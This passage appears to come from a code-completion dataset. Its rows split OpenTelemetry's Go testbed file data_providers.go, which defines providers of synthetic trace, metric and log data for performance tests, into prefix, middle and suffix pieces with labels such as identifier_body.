		dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
		if err != nil {
			log.Printf("cannot generate metrics: %s", err)
			// BUG FIX: keep a non-nil empty slice so a failed generation is
			// not pointlessly retried (and re-logged) on every call.
			dp.metricsGenerated = []pmetric.Metrics{}
		}
	}
	// >= (not ==) mirrors GenerateTraces and stays safe if the index ever
	// overshoots the generated slice.
	if dp.metricsIndex >= len(dp.metricsGenerated) {
		return pmetric.Metrics{}, true
	}
	pdm := dp.metricsGenerated[dp.metricsIndex]
	dp.metricsIndex++
	dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
	return pdm, false
}
// GenerateLogs is not supported by the golden dataset; it always reports
// exhaustion with an empty Logs instance.
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
// Only the field matching the data type passed to NewFileDataProvider is
// populated; the others stay zero-valued.
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
// ItemsPerBatch is the item count of the loaded message (spans, data
// points, or log records, depending on the data type).
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file. It returns an error when the file cannot be read or the
// data type is not one of traces, metrics, or logs.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
	dp := &FileDataProvider{}
	var err error
	// Load the message from the file and count the data points.
	switch dataType {
	case component.DataTypeTraces:
		if dp.traces, err = golden.ReadTraces(filePath); err != nil {
			return nil, err
		}
		dp.ItemsPerBatch = dp.traces.SpanCount()
	case component.DataTypeMetrics:
		if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
			return nil, err
		}
		dp.ItemsPerBatch = dp.metrics.DataPointCount()
	case component.DataTypeLogs:
		if dp.logs, err = golden.ReadLogs(filePath); err != nil {
			return nil, err
		}
		dp.ItemsPerBatch = dp.logs.LogRecordCount()
	default:
		// ROBUSTNESS FIX: an unknown data type previously fell through
		// silently, yielding a provider with ItemsPerBatch == 0.
		return nil, fmt.Errorf("unsupported data type %q", dataType)
	}
	return dp, nil
}
// SetLoadGeneratorCounters stores the LoadGenerator-owned item counter that
// the Generate* methods increment on each call.
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
// GenerateTraces replays the file-loaded traces; the same batch is returned on
// every call and the provider never reports exhaustion.
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
// GenerateMetrics replays the file-loaded metrics; the same batch is returned
// on every call and the provider never reports exhaustion.
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
// GenerateLogs replays the file-loaded logs; the same batch is returned on
// every call and the provider never reports exhaustion.
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
}
| SetLoadGeneratorCounters | identifier_name |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters.
type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) |
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
}
| {
dp.dataItemsGenerated = dataItemsGenerated
} | identifier_body |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters.
type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes |
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
}
| {
attrs.PutStr(k, v)
} | conditional_block |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
"log"
"strconv"
"sync/atomic"
"time"
"go.opentelemetry.io/collector/component"
"go.opentelemetry.io/collector/pdata/pcommon"
"go.opentelemetry.io/collector/pdata/plog"
"go.opentelemetry.io/collector/pdata/pmetric"
"go.opentelemetry.io/collector/pdata/ptrace"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters. | type perfTestDataProvider struct {
options LoadOptions
traceIDSequence atomic.Uint64
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
return &perfTestDataProvider{
options: options,
}
}
func (dp *perfTestDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
return &goldenDataProvider{
tracePairsFile: tracePairsFile,
spanPairsFile: spanPairsFile,
metricPairsFile: metricPairsFile,
}
}
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
if dp.tracesGenerated == nil {
var err error
dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
if err != nil {
log.Printf("cannot generate traces: %s", err)
dp.tracesGenerated = nil
}
}
if dp.tracesIndex >= len(dp.tracesGenerated) {
return ptrace.NewTraces(), true
}
td := dp.tracesGenerated[dp.tracesIndex]
dp.tracesIndex++
dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
return td, false
}
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
if dp.metricsGenerated == nil {
var err error
dp.metricsGenerated, err = goldendataset.GenerateMetrics(dp.metricPairsFile)
if err != nil {
log.Printf("cannot generate metrics: %s", err)
}
}
if dp.metricsIndex == len(dp.metricsGenerated) {
return pmetric.Metrics{}, true
}
pdm := dp.metricsGenerated[dp.metricsIndex]
dp.metricsIndex++
dp.dataItemsGenerated.Add(uint64(pdm.DataPointCount()))
return pdm, false
}
func (dp *goldenDataProvider) GenerateLogs() (plog.Logs, bool) {
return plog.NewLogs(), true
}
// FileDataProvider in an implementation of the DataProvider for use in performance tests.
